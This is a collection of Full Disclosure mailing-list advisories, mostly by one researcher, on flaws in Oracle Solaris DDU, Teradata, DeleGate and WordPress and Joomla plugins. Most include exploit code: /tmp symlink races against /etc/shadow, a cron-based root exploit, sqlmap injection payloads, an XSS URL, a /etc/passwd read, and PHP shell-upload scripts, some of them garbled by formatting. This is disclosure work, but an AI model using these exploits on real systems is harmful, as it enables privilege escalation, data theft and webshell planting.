[FD] Insecure /tmp file use in Oracle Solaris 11 Device Driver Utility v1.3.1 leads to root
Title: Insecure /tmp file use in Oracle Solaris 11 Device Driver Utility v1.3.1 leads to root Author: Larry W. Cashdollar, @_larry0 Date: 2020-02-02 CVE-2020-14724 Download Site: https://docs.oracle.com/cd/E37838_01/html/E69250/useddu.html Vendor: Oracle, fixed in July 14 2020 CPU https://www.oracle.com/security-alerts/cpujul2020.html. Vendor Notified: 2020-02-02 Vendor Contact: secalert...@oracle.com Advisory: http://www.vapidlabs.com/advisory.php?v=212 Description: "The Device Driver Utility provides information about the devices on your installed system and the drivers that manage those devices. The DDU reports whether the currently booted operating system has drivers for all of the devices that are detected in your system. If a device does not have a driver attached, the Device Driver Utility recommends a driver package to install." Vulnerability: Append contents of ddu_log to system files via symlink attack: In ./ddu-text/utils/ddu-text.py 18 LOG_LOCATION = "/tmp/ddu_log" . 45: print _("Exiting Text Installer. Log is available at:\n%s") % LOG_LOCATION 50: logging.basicConfig(filename=LOG_LOCATION, level=LOG_LEVEL, Elevation of priviledges via symlink attack due to chmod operation on /tmp file: In file ./ddu-text/utils/inner_window.py 667: logfile = open('/tmp/ddu_err.log', 'a') 695: logfile = open('/tmp/ddu_err.log', 'a') 721: logfile = open('/tmp/ddu_err.log', 'a') 748: logfile = open('/tmp/ddu_err.log', 'a') In file ./scripts/comp_lookup.sh 33:typeset err_log=/tmp/ddu_err.log In file ./scripts/det_info.sh 38:typeset err_log=/tmp/ddu_err.log In file ./scripts/pkg_relate.sh 449:typeset err_log=/tmp/ddu_err.log In file ./scripts/find_media.sh 20:typeset err_log=/tmp/ddu_err.log There is a race condition here between file creation and chmod 666 where a local user can run a simple script to ensure the symlink exists after the ddu_err.log file is removed: In file ./scripts/probe.sh 569: # Make /tmp/ddu_err.log writable for every user 571: if [ -f /tmp/ddu_err.log ]; then 572: pfexec chmod 666 /tmp/ddu_err.log 574: touch /tmp/ddu_err.log; chmod 666 /tmp/ddu_err.log 636:typeset err_log=/tmp/ddu_err.log These are also potential file clobbering issues: From probe.sh 131: NIC_info_file=/tmp/dvt_network_info_file 133: temp_file=/tmp/dvt_network_temp 134: temp_file_2=/tmp/dvt_network_temp_2 207: c_file=/tmp/str_ctrl_file 208: c_file1=/tmp/str_ctrl_file_1 209: c_file2=/tmp/str_ctrl_file_2 210: c_file3=/tmp/str_ctrl_file_3 211: c_file4=/tmp/str_ctrl_file_4 212: c_file5=/tmp/str_ctrl_file_5 328: dvt_cd_dev_tmpfile=/tmp/dvt_cd_dev_tmpfile 329: dvt_cd_ctl_tmpfile=/tmp/dvt_cd_ctl_tmpfile 330: dvt_cd_ctl_tmpfile1=/tmp/dvt_cd_ctl_tmpfile1 398: temp_file1=/tmp/dvt_tmp_file1 399: temp_file2=/tmp/dvt_tmp_file2 462: cpu_tmpfile=/tmp/cpu_tmpfile 490: memory_tmpfile=/tmp/memory_tmpfile 624:typeset ctl_file=/tmp/dvt_ctl_file Exploit Code: 1. Tested on Solaris 11 x86 2. larry@SolSun:~$ uname -a 3. SunOS SolSun 5.11 11.4.0.15.0 i86pc i386 i86pc 4. and 5. Open Indiana 6. root@openindiana:/export/home/larry# uname -a 7. SunOS openindiana 5.11 illumos-1b500975aa i86pc i386 i86pc 9. Append content to /etc/passwd 10. larry@openindiana:/tmp$ ln -s /etc/passwd ddu_log 12. To get local root simply have ddu http://www.php.net/chmod 666 /etc/shadow 13. larry@openindiana:/tmp$ while true; do ln -s /etc/shadow ddu_err.http://www.php.net/log; done 14. 15. A better exploit: https://github.com/lcashdol/Exploits/tree/master/ddu-exploit Patches to OpenIndiana https://github.com/OpenIndiana/ddu/commit/31dca7f6bee738980ecabefadedd01fcc3f3acf6 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0
Title: Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0 Vulnerability Date: 2017-02-27 Download: https://wordpress.org/plugins/zen-mobile-app-native/ Vendor: https://profiles.wordpress.org/zendkmobileapp/ Notified: 2017-02-27 Description: Mobile App WordPress plugin lets you turn your website into a full-featured mobile application in minutes using Mobile App Builder. Vulnerability: The code in file ./zen-mobile-app-native/server/images.php doesn't require authentication or check that the user is allowed to upload content. It also doesn't sanitize the file upload against executable code. http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native/server/images.php; http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native//server/images/8d5e957f297893487bd98fa830fa6413.php https://github.com/lcashdol/Exploits/blob/master/mobile_plugin_exploit.sh URL: http://www.vapidlabs.com/advisory.php?v=178 Credit: Larry W. Cashdollar, @_larry0 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Stored Cross-Site Scripting in WP Canvas - Shortcodes WordPress Plugin
Hello All, These are really great advisories, my only wish is that they were copied to the security lists in their entirety. This way we aren't relying on a single point of failure (your website) when looking for the data in the future. Thanks! Larry > On Nov 19, 2016, at 5:48 AM, Summer of Pwnagewrote: > > > Stored Cross-Site Scripting in WP Canvas - Shortcodes WordPress Plugin > > Yorick Koster, July 2016 > > > Abstract > > A Cross-Site Scripting vulnerability was found in the WP Canvas - > Shortcodes WordPress Plugin. This issue allows an attacker to perform a > wide variety of actions, such as stealing Administrators' session > tokens, or performing arbitrary actions on their behalf. This issue can > be exploited by authenticated users with the Contributor or higher role. > > > OVE ID > > OVE-20160724-0031 > > > Tested versions > > This issue was successfully tested on WP Canvas - Shortcodes WordPress > Plugin version 1.92. > > > Fix > > This issue has been addressed in WP Canvas - Shortcodes WordPress Plugin > version 2.07. > > > Details > > https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_in_wp_canvas___shortcodes_wordpress_plugin.html > > > Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its > goal is to contribute to the security of popular, widely used OSS > projects in a fun and educational way. > > ___ > Sent through the Full Disclosure mailing list > https://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] /tmp race condition in Teradata Studio Express v15.12.00.00 studioexpressinstall
Title: /tmp race condition in Teradata Studio Express v15.12.00.00 studioexpressinstall Author: Larry W. Cashdollar, @_larry0 Date: 2016-10-03 Download Site: http://downloads.teradata.com/download/tools/teradata-studio-express Vendor: Teradata Vendor Notified: 2016-10-03 Vendor Contact: web form contact Description: Teradata Studio Express provides an information discovery tool that retrieves data from Teradata Database systems and allows the data to be manipulated and stored on the desktop. It is built on the Eclipse Rich Client Platform (RCP). Vulnerability: The installation script for TeradataStudioExpress.15.12.00.00 creates files in /tmp insecurely. A malicious local user could create a symlink in /tmp and possibly clobber system files or perhaps elevate privileges. $ grep -n "/tmp" studioexpressinstall 33:ASKDIRFILE=/tmp/sqlajeaskdir 41:DEF_TRACEFILE=/tmp/studioexinstall.log 44:TMP=/tmp 72:SQLAJEINPUTS=/tmp/studioexinputs 90:RPM_OUT_FILE=/tmp/studioexinstall_rpmcmd.out 103:SQLAJEINSTALL=/tmp/studioexpressinstall 136: java -version > "/tmp/javaver" 2>&1 137: verstring=`grep "java version" /tmp/javaver` 143: jre64b=`grep "64-Bit" /tmp/javaver` 212:rm -f /tmp/javaver 341: tmptracefile=/tmp/studioexinstall.log.tmp#Temporary trace file. 588:touch /tmp/checkstudioexinstall 603:rm -f /tmp/checkstudioexinstall 604:rm -f /tmp/studioexinstall_rpmcmd.out CVE-ID: CVE-2016-7490 Export: JSON TEXT XML Exploit Code: • $ ln -s /tmp/javaver /etc/passed Advisory: http://www.vapidlabs.com/advisory.php?v=174 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp
Title: Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp Author: Larry W. Cashdollar, @_larry0 Date: 2016-10-01 Download Site: http://downloads.teradata.com/download/database/teradata-virtual-machine-community-edition-for-vmware Vendor: Teradata Vendor Notified: 2016-10-01 Vendor Contact: web form contact Description: Teradata is a relational database, they provide a Virtual Machine image for developers and community use. Vulnerability: Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp may lead to elevated code execution. In /opt/teradata/gsctools/bin/t2a.pl 320 `chmod +x /tmp/$PROG.get_profile.scr ; /tmp/$PROG.get_profile.scr >/dev/null 2>&1` ; If a regular user controls /tmp/t2a.pl.get_profile.scr before the person executing this script creates it they can inject commands to be executed as that user. for example: $ while(true) do echo "chmod 666 /etc/shadow" > /tmp/t2a.pl.get_profile.scr; done If root or any other account runs that .pl script I see these files being created in /tmp [C] -rw-r- 1 root root 14 Mon Oct 3 13:03:59 2016 /tmp/t2a.vprocmanager.cmd [U] -rw-r- 1 root root 14 Mon Oct 3 13:03:59 2016 /tmp/t2a.vprocmanager.cmd [C] -rw-r- 1 root root 0 Mon Oct 3 13:03:59 2016 /tmp/t2a.vprocmanager [C] -rw-r- 1 root root 0 Mon Oct 3 13:03:59 2016 /tmp/t2a.vprocmanager.stderr [U] -rw-r- 1 root root 44 Mon Oct 3 13:03:59 2016 /tmp/t2a.vprocmanager.stderr [U] -rw-r- 1 root root 152 Mon Oct 3 13:03:59 2016 /tmp/t2a.vprocmanager.stderr [C] -rw-r- 1 root root 5 Mon Oct 3 13:03:59 2016 /tmp/t2a.get_profile.scr [U] -rw-r- 1 root root 5 Mon Oct 3 13:03:59 2016 /tmp/t2a.get_profile.scr [M] -rwxr-x--- 1 root root 5 Mon Oct 3 13:03:59 2016 /tmp/t2a.get_profile.scr CVE-ID: CVE-2016-7489 Exploit Code: • $ while(true) do echo "chmod 666 /etc/shadow" > /tmp/t2a.pl.get_profile.scr; done Advisory: www.vapidlabs.com/advisory.php?v=173 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Teradata Virtual Machine Community Edition v15.10 has insecure file permission
Title: Teradata Virtual Machine Community Edition v15.10 has insecure file permission Author: Larry W. Cashdollar, @_larry0 Date: 2016-10-01 Download Site: http://downloads.teradata.com/download/database/teradata-virtual-machine-community-edition-for-vmware <http://downloads.teradata.com/download/database/teradata-virtual-machine-community-edition-for-vmware> Vendor: Teradata Vendor Notified: 2016-10-01 Vendor Contact: webform contact Description: A database appliance for virtual machine environments. Vulnerability: Teradata Virtual Machine Community Edition v15.10 has insecure file permissions on /etc/luminex/pkgmgr. These could allow a local user to modify its contents and execute commands as root. TVME:/ # ls -ld /etc/luminex/ drwxrwxrwx 2 root root 4096 Mar 3 2016 /etc/luminex/ TVME:/# ls -l /etc/luminex/ total 128 -rwxrwxrwx 1 root root 24576 Mar 3 2016 packages.db -rwxrwxrwx 1 root root 102357 Mar 3 2016 pkgmgr CVE: CVE-2016-7488 Exploit Code: • $ echo "#/bin/bash" > /etc/luminex/pkgmgr • $ echo "chmod 666 /etc/shadow" >> /etc/luminex/pkgmgr • $ chmod 755 /etc/luminex/pkgmgr Advisory: http://www.vapidlabs.com/advisory.php?v=172 <http://www.vapidlabs.com/advisory.php?v=172> ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6
Title: Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6 Author: Larry W. Cashdollar, @_larry0 Date: 2016-09-16 Download Site: http://huge-it.com/joomla-portfolio-gallery/ Vendor: huge-it.com Vendor Notified: 2016-09-17 Vendor Contact: i...@huge-it.com Description: Huge-IT Portfolio Gallery extension can do wonders with your website. If you wish to show your photos, videos, enclosing the additional images and videos, then this Portfolio Gallery extension is what you need. Vulnerability: The following lines allow unauthenticated users to perform SQL injection against the functions in ajax_url.php: In file ajax_url.php: 11 define('_JEXEC',1); 12 defined('_JEXEC') or die('Restircted access'); . . . 49 $page = $_POST["page"]; 50 $num=$_POST['perpage']; 51 $start = $page * $num - $num; 52 $idofgallery=$_POST['galleryid']; 53 $level = $_POST['level']; 54 $query = $db->getQuery(true); 55 $query->select('*'); 56 $query->from('#__huge_itportfolio_images'); 57 $query->where('portfolio_id ='.$idofgallery); 58 $query ->order('#__huge_itportfolio_images.ordering asc'); 59 $db->setQuery($query,$start,$num); CVE-2016-1000124 Exploit Code: • $ sqlmap -u 'http://example.com/components/com_portfoliogallery/ajax_url.php' --data="page=1=*=huge_it_portfolio_gallery_ajax=20=2" --level=5 --risk=3 • • • (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] • sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests: • --- • Parameter: #1* ((custom) POST) • Type: error-based • Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) • Payload: page=1=-2264 OR 1 GROUP BY CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0 END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING MIN(0)#=huge_it_portfolio_gallery_ajax=20=2 • • Type: AND/OR time-based blind • Title: MySQL >= 5.0.12 time-based blind - Parameter replace • Payload: page=1=(CASE WHEN (9445=9445) THEN SLEEP(5) ELSE 9445 END)=huge_it_portfolio_gallery_ajax=20=2 • --- • [13:30:39] [INFO] the back-end DBMS is MySQL • web server operating system: Linux Debian 8.0 (jessie) • web application technology: Apache 2.4.10 • back-end DBMS: MySQL >= 5.0.12 • [13:30:39] [WARNING] HTTP error codes detected during run: • 500 (Internal Server Error) - 2715 times • [13:30:39] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4' • • [*] shutting down at 13:30:39 Advisory: http://www.vapidlabs.com/advisory.php?v=170 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
Title: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla Author: Larry W. Cashdollar, @_larry0 Date: 2016-09-16 Download Site: http://huge-it.com/joomla-catalog/ Vendor: huge-it.com Vendor Notified: 2016-09-17 Vendor Contact: i...@huge-it.com Description: Huge-IT Product Catalog is made for demonstration, sale, advertisements for your products. Imagine a stand with a variety of catalogs with a specific product category. To imagine is not difficult, to use is even easier. Vulnerability: The following code does not prevent an unauthenticated user from injecting SQL into functions via 'load_more_elements_into_catalog' located in ajax_url.php. Vulnerable Code in : ajax_url.php 11 define('_JEXEC', 1); 12 defined('_JEXEC') or die('Restircted access'); . . . 308 } elseif ($_POST["post"] == "load_more_elements_into_catalog") { 309 $catalog_id = $_POST["catalog_id"]; 310 $old_count = $_POST["old_count"]; 311 $count_into_page = $_POST["count_into_page"]; 312 $show_thumbs = $_POST["show_thumbs"]; 313 $show_description = $_POST["show_description"]; 314 $show_linkbutton = $_POST["show_linkbutton"]; 315 $parmalink = $_POST["parmalink"]; 316 $level = $_POST['level']; . . . 359 $query->select('*'); 360 $query->from('#__huge_it_catalog_products'); 361 $query->where('catalog_id =' . $catalog_id); 362 $query->order('ordering asc'); 363 $db->setQuery($query, $from, $count_into_page); CVE-2016-1000125 Exploit Code: • $ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php' --data="prod_page=1=load_more_elements_into_catalog_id=*_count=*_into_page=*_thumbs=*_description=*=*" --level=5 --risk=3 • • Parameter: #1* ((custom) POST) • Type: error-based • Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) • Payload: prod_page=1=load_more_elements_into_catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#_count=_into_page=_thumbs=_description== • • Type: AND/OR time-based blind • Title: MySQL >= 5.0.12 time-based blind - Parameter replace • Payload: prod_page=1=load_more_elements_into_catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)_count=_into_page=_thumbs=_description== • • Type: UNION query • Title: Generic UNION query (random number) - 15 columns • Payload: prod_page=1=load_more_elements_into_catalog_id=-5943 UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy_count=_into_page=_thumbs=_description== • --- • [16:48:10] [INFO] the back-end DBMS is MySQL • web server operating system: Linux Debian 8.0 (jessie) • web application technology: Apache 2.4.10 • back-end DBMS: MySQL >= 5.0.12 • [16:48:10] [WARNING] HTTP error codes detected during run: • 500 (Internal Server Error) - 6637 times • [16:48:10] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com' • • [*] shutting down at 16:48:10 • Advisory: http://www.vapidlabs.com/advisory.php?v=171 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] XSS and SQLi in huge IT gallery v1.1.5 for Joomla
Title: XSS and SQLi in huge IT gallery v1.1.5 for Joomla Fixed: v1.1.7 Author: Larry W. Cashdollar, @_larry0 and Elitza Neytcheva, @ElitzaNeytcheva Date: 2016-07-14 Download Site: http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-pro Vendor: huge-it.com Vendor Notified: 2016-07-15, fixed 2016-07-23 Vendor Contact: i...@huge-it.com Description: The plugin allows you to add multiple images to the gallery, create countless galleries, add a description to each of them, as well as make the same things with video links. Vulnerability: The attacker must be logged in with at least manager level access or access to the administrative panel to exploit this vulnerability: SQL in code via id parameter: ./administrator/components/com_gallery/models/gallery.php 51 public function getPropertie() { 52 $db = JFactory::getDBO(); 53 $id_cat = JRequest::getVar('id'); 54 $query = $db->getQuery(true); 55 $query->select('#__huge_itgallery_images.name as name,' 56 . '#__huge_itgallery_images.id ,' 57 . '#__huge_itgallery_gallerys.name as portName,' 58 . 'gallery_id, #__huge_itgallery_images.description as description,image_url,sl_url,sl_type,link_target,#__huge_itg allery_images.ordering,#__huge_itgallery_images.published,published_in_sl_width'); 59 $query->from(array('#__huge_itgallery_gallerys' => '#__huge_itgallery_gallerys', '#__huge_itgallery_images' => '#__huge_itg allery_images')); 60 $query->where('#__huge_itgallery_gallerys.id = gallery_id')->where('gallery_id=' . $id_cat); 61 $query->order('ordering desc'); 62 64 $db->setQuery($query); 65 $results = $db->loadObjectList(); 66 return $results; 67 } XSS is here: root@Joomla:/var/www/html# find . -name "*.php" -exec grep -l "echo \$_GET" {} \; ./administrator/components/com_gallery/views/gallery/tmpl/default.php root@Joomla:/var/www/html# find . -name "*.php" -exec grep -n "echo \$_GET" {} \; 256: CVE Assignments: CVE-2016-1000113 XSS, CVE-2016-1000114 SQL Injection JSON: Export Exploit Code: XSS PoC http://192.168.0.125/administrator/index.php?option=com_gallery=gallery=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E SQLi PoC http://192.168.0.125/administrator/index.php?option=com_gallery=gallery=SQLiHERE $ sqlmap --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_gallery=gallery=*; --dbms mysql Screen Shots: Advisory: http://www.vapidlabs.com/advisory.php?v=164 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Local root vulnerability in DeleGate v9.9.13
Title: Local root vulnerability in DeleGate v9.9.13 Author: Larry W. Cashdollar, @_larry0 Date: 2015-12-17 Advisory: http://www.vapidlabs.com/advisory.php?v=159 Download Sites: http://delegate.hpcc.jp/delegate/ http://delegate.org/delegate/ Vendor: National Institute of Advanced Industrial Science and Technology Vendor Notified: 2015-12-17 Vendor Contact: y.s...@delegate.org ys...@etl.go.jp Description: DeleGate is a multipurpose proxy server which relays various application protocols on TCP/IP or UDP/IP, including HTTP, FTP, Telnet, NNTP, SMTP, POP, IMAP, LPR, LDAP, ICP, DNS, SSL, Socks, and more. DeleGate mediates communication between servers and clients where direct communication is impossible, inefficient, or inconvenient. Vulnerability: Installation of delegate 9.9.13 sets some binaries setuid root, at least one of these binaries can be used to escalate the privileges of a local user. The binary dgcpnod creates a node allowing a local unprivileged user to create files anywhere on disk. By creating a file in /etc/cron.hourly a local user can execute commands as root. Installation of software via source or binary distribution with option to not run as root results in a script set-subin.sh to run setting the setuid bit on four binaries. In Linux distributions where this software is part of the package list these binaries are not setuid root. (archlinux) From documentation http://www.delegate.org/delegate/newbies-ja.shtml (translated to english): Go is included in the binary distribution, or DGROOT that you can build from the source to the location of preference, and then change the name if necessary. This is the DgRoot. In addition, if needed, you can rename the executable file of DeleGate to the name of the preference. This is the DgExe. "In Unix version subin in if you want to use "(such as when using a privileged port), do the following. (3-2uk) $ cd DgRoot / subin $ Sh setup-subin.sh larry@f4ult:~/dg9_9_13/DGROOT/subin$ ls -l total 1916 -r-sr-s--- 1 root larry 384114 Oct 31 2014 dgbind -r-sr-s--- 1 root larry 384598 Oct 31 2014 dgchroot -r-sr-s--- 1 root larry 384161 Oct 31 2014 dgcpnod -rwxr-xr-x 1 larry larry 384114 Oct 31 2014 dgdate -rwxr-xr-x 1 larry larry 29066 Oct 31 2014 dgforkpty -r-sr-s--- 1 root larry 384113 Oct 31 2014 dgpam -rwxr-x--- 1 larry larry272 Oct 27 2014 setup-subin.sh This script sets the setuid bit on four binaries: larry@f4ult:~/dg9_9_13/DGROOT/subin$ cat setup-subin.sh #!/bin/sh SUBINS="dgpam dgbind dgchroot dgcpnod" sudo sh -c "chown root $SUBINS; chmod 6550 $SUBINS" if [ $? != 0 ]; then su root -c "chown root $SUBINS; chmod 6550 $SUBINS" fi CVEID: 2015-7556 Exploit Code: $ touch /tmp/rootme; chmod +x /tmp/rootme; ./dgcpnod /tmp/rootme /etc/cron.hourly/rootme; echo -e '#!/bin/bash \n chmod 777 /etc/shadow' > /etc/cron.hourly/rootme ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
On Jul 16, 2015, at 8:18 PM, Larry W. Cashdollar lar...@me.com wrote: Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-09 Download Site: https://wordpress.org/plugins/mailcwp/ Vendor: CadreWorks Pty Ltd Vendor Notified: 2015-07-09 fixed in v1.110 Typo should be v1.100. ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-09 Download Site: https://wordpress.org/plugins/mailcwp/ Vendor: CadreWorks Pty Ltd Vendor Notified: 2015-07-09 fixed in v1.110 Vendor Contact: Contact Page via WP site Description: MailCWP, Mail Client for WordPress. A full-featured mail client plugin providing webmail access through your WordPress blog or website. Vulnerability: The code in mailcwp-upload.php doesn't check that a user is authenticated or what type of file is being uploaded any user can upload a shell to the target wordpress server: 2 $message_id = $_REQUEST[message_id]; 3 $upload_dir = $_REQUEST[upload_dir]; . . 8 $fileName = $_FILES[file][name]; 9 move_uploaded_file($_FILES[file][tmp_name], $upload_dir/$message_id-$fileName); Exploitation requires the attacker to guess a writeable location in the http server root. CVEID: OSVDB: Exploit Code: • ?php • /*Larry W. Cashdollar @_larry0 • Exploit for mailcwp v1.99 shell will be called 1-shell.php. • 7/9/2015 • */ • $target_url = 'http://www.example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1upload_dir=/usr/share/wordpress/wp-content/uploads'; • $file_name_with_full_path = '/var/www/shell.php'; • • echo POST to $target_url $file_name_with_full_path; • $post = array('file' = 'shell.php','file'='@'.$file_name_with_full_path); • • $ch = curl_init(); • curl_setopt($ch, CURLOPT_URL,$target_url); • curl_setopt($ch, CURLOPT_POST,1); • curl_setopt($ch, CURLOPT_POSTFIELDS, $post); • curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); • $result=curl_exec ($ch); • curl_close ($ch); • echo hr; • echo $result; • echo hr; • ? • Advisory: http://www.vapid.dhs.org/advisory.php?v=138 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Remote file download vulnerability in Wordpress Plugin image-export v1.1
Title: Remote file download vulnerability in Wordpress Plugin image-export v1.1 Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-01 Download Site: https://wordpress.org/plugins/image-export Vendor: www.1efthander.com Vendor Notified: 2015-07-05 Vendor Contact: https://twitter.com/1eftHander Description: Image Export plugin can help you selectively download images uploaded by an administrator . Vulnerability: The code in file download.php doesn't do any checking that the user is requesting files from the uploaded images directory only. And line 8 attempts to unlink the file after being downloaded. This script could be used to delete files out of the wordpress directory if file permissions allow. 1 ?php 2 if ( isset( $_REQUEST['file'] ) !empty( $_REQUEST['file'] ) ) { 3 $file = $_GET['file']; 4 5 header( 'Content-Type: application/zip' ); 6 header( 'Content-Disposition: attachment; filename=' . $file . '' ); 7 readfile( $file ); 8 unlink( $file ); 9 10 exit; 11 } 12 ? CVEID: TBD Exploit Code: • $ curl http://example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd Screen Shots: Advisory: http://www.vapid.dhs.org/advisory.php?v=135 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Remote file upload vulnerability SQLi in wordpress plugin wp-powerplaygallery v3.3
Title: Remote file upload vulnerability SQLi in wordpress plugin wp-powerplaygallery v3.3 Author: Larry W. Cashdollar, @_larry0 Date: 2015-06-27 Download Site: https://wordpress.org/plugins/wp-powerplaygallery Vendor: WP SlideShow Vendor Notified: 2015-06-29 Advisory: http://www.vapid.dhs.org/advisory.php?v=132 Vendor Contact: plug...@wordpress.org Description: This is the best gallery for touch screens. It is fully touch enabled with great features. This gallery is compatible wiht iphone and ipads. It is also allow us to use it as a widget.You can also enable this Powerplay Gallery on your wordpress site by placing code snippet in your template (.php) files. It shows flash gallery for desktops and touch enabled version for ipad and iphones. Vulnerability: 1. Ability to create directories out side of the upload path by using ../: Lines 56-59 of upload.php: 56 // Create target dir 57 if (!file_exists($targetDir)) { 58 @mkdir($targetDir); 59 } 2. Arbitrary file uploads to a path in the web root directory: Lines 138-160 of uploads.php don’t verify what types of files are allowed or where they should be placed: 138 // Open temp file 139 if (!$out = @fopen({$filePath}.part, $chunks ? ab : wb)) { 140 die('{jsonrpc : 2.0, error : {code: 102, message: Failed to open output stream.}, id : id}'); 141 } 142 143 if (!empty($_FILES)) { 144 if ($_FILES[file][error] || !is_uploaded_file($_FILES[file][tmp_name])) { 145 die('{jsonrpc : 2.0, error : {code: 103, message: Failed to move uploaded file.}, id : id}'); 146 } 147 148 // Read binary input stream and append it to temp file 149 if (!$in = @fopen($_FILES[file][tmp_name], rb)) { 150 die('{jsonrpc : 2.0, error : {code: 101, message: Failed to open input stream.}, id : id}'); 151 } 152 } else { 153 if (!$in = @fopen(php://input, rb)) { 154 die('{jsonrpc : 2.0, error : {code: 101, message: Failed to open input stream.}, id : id}'); 155 } 156 } 157 158 while ($buff = fread($in, 4096)) { 159 fwrite($out, $buff); 160 } 3. Sql injection Lines 131-135 of upload.php fail to handle user input appropriately either by sanitizing or paramaterizing it. Injection points are any GET/POST to albumid or name. 131 $query = INSERT INTO .$wpdb-prefix.pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `image`, `status`, `order`, `creation_date` ) 132 VALUES (.$_REQUEST['albumid'].,'.$imgname[0].','.$imgname[0].','','.$resize.','.$_REQUEST ['name'].',1,'','NULL'); 133 134 $wpdb-query($query); 135 CVEID: OSVDB: Exploit Code: • ?php • /*Remote shell upload exploit for wp-powerplaygallery v3.3 */ • /*Larry W. Cashdollar @_larry0 • 6/27/2015 • albumid needs to be a numeric value matching an existing album number, 1 is probably a good start • but you can enumerate these by using curl, and looking for redirect 301 responses: • e.g. $ curl http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big • -301 exists else 404 doesn't. • shell is http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php • */ • • • $target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php'; • $file_name_with_full_path = '/var/www/shell.php'; • • echo POST to $target_url $file_name_with_full_path; • $post = array('albumid'='foo' , 'name' = 'shell.php','file'='@'.$file_name_with_full_path); • • $ch = curl_init(); • curl_setopt($ch, CURLOPT_URL,$target_url); • curl_setopt($ch, CURLOPT_POST,1); • curl_setopt($ch, CURLOPT_POSTFIELDS, $post); • curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); • $result=curl_exec ($ch); • curl_close ($ch); • echo hr; • echo $result; • echo hr; • ? SQLi PoC: $ sqlmap -u http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php --data albumid=1” —dbms mysql ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: 